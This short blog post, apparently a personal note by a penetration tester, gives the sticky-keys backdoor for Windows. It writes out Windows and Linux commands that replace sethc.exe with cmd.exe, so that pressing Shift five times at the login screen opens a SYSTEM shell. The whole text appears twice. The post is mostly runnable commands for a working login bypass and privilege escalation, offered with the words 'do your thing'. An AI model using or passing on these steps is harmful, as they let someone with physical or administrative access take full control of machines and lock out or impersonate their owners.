This has been documented all over, but i like things to be on the blog so i can find them...
You can gain a SYSTEM shell on an application you have administrative access on or if you have physical access to the box and can boot to repair disk or linux distro and can change files.
make a copy somewhere of the original on system sethc.exe
copy c:\windows\system32\sethc.exe c:\
cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe
copy cmd.exe into sethc.exe's place
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
or
cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe
Reboot, hit Shift key 5 times, SYSTEM shell will pop up, do your thing
it would probably be nice to sethc.exe back when you are done.
You can gain a SYSTEM shell on an application you have administrative access on or if you have physical access to the box and can boot to repair disk or linux distro and can change files.
make a copy somewhere of the original on system sethc.exe
copy c:\windows\system32\sethc.exe c:\
cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe
copy cmd.exe into sethc.exe's place
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
or
cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe
Reboot, hit Shift key 5 times, SYSTEM shell will pop up, do your thing
it would probably be nice to sethc.exe back when you are done.